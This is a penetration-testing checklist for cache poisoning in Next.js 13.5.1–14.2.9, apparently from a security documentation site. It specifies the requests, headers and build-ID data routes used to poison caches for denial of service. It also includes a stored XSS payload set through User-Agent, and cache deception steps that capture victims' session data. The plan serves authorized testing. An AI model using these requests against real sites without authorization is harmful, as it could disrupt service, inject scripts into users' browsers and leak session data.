Cache Poisoning Test Plan for Next.js
1. Reconnaissance
Identify Next.js: Check for
/api/,_next/paths, orX-Powered-By: Next.jsheader.Verify Version: Review source (e.g.,
<script id="__NEXT_DATA__">) forbuildIDor version clues (13.5.1–14.2.9).Detect SSR: Target pages using
getServerSideProps(dynamic data, e.g.,/dashboard). Avoid dynamic routes (e.g.,/blog/[slug]).Check Caching: Send repeated requests; look for
Cache-Controlor CDN headers (e.g.,Server: cloudflare).
2. Test DoS via Cache Poisoning
Setup: Use Burp Repeater/Intruder; identify SSR page (e.g.,
/poc).Test 1:
__nextDataReqParameterSend:
GET /poc?__nextDataReq=1Check: JSON
pagePropsresponse (e.g.,{"userAgent":"..."}).Re-request
/pocwithout param; if JSON served, cache poisoned (DoS).
Test 2:
x-now-route-matchesHeaderSend:
GET /poc?__nextDataReq=1withx-now-route-matches: 1.Verify:
Cache-Control: s-maxage=1, stale-while-revalidate; re-request/pocfor JSON.
Test 3: Data Route
Extract
buildIDfrom<script id="__NEXT_DATA__">.Send:
GET /_next/data/{buildID}/poc.jsonwithx-now-route-matches: 1.Confirm: JSON cached;
/pocserves JSON.
Safeguard: Test with
Accept-Encoding: noneif header is in cache-key to avoid impacting users.
3. Test Stored XSS
Identify Reflection: Check if SSR page reflects request data (e.g., user-agent, cookies, CSRF token).
Craft Payload:
Send:
GET /poc?__nextDataReq=1withUser-Agent: <img src=x onerror=alert('test')>andx-now-route-matches: 1.Verify: Cached
/pocresponse istext/htmlwith payload.Access
/pocin browser; confirm alert triggers.
Common Reflections: User-agent, locale cookies, session IDs, CSRF headers, theme preferences.
4. Test Cache Deception
Target Sensitive Data: Check if SSR reflects user-specific data (e.g., session cookies).
Send Payload: Use above methods to cache victim’s response.
Verify: Access
/pocto see if sensitive data is served.References:
Advisory: https://github.com/advisories/GHSA-gp8f-8m3g-qvj9
PortSwigger Cache Poisoning: https://portswigger.net/web-security/web-cache-poisoning
Automation
Last updated
Was this helpful?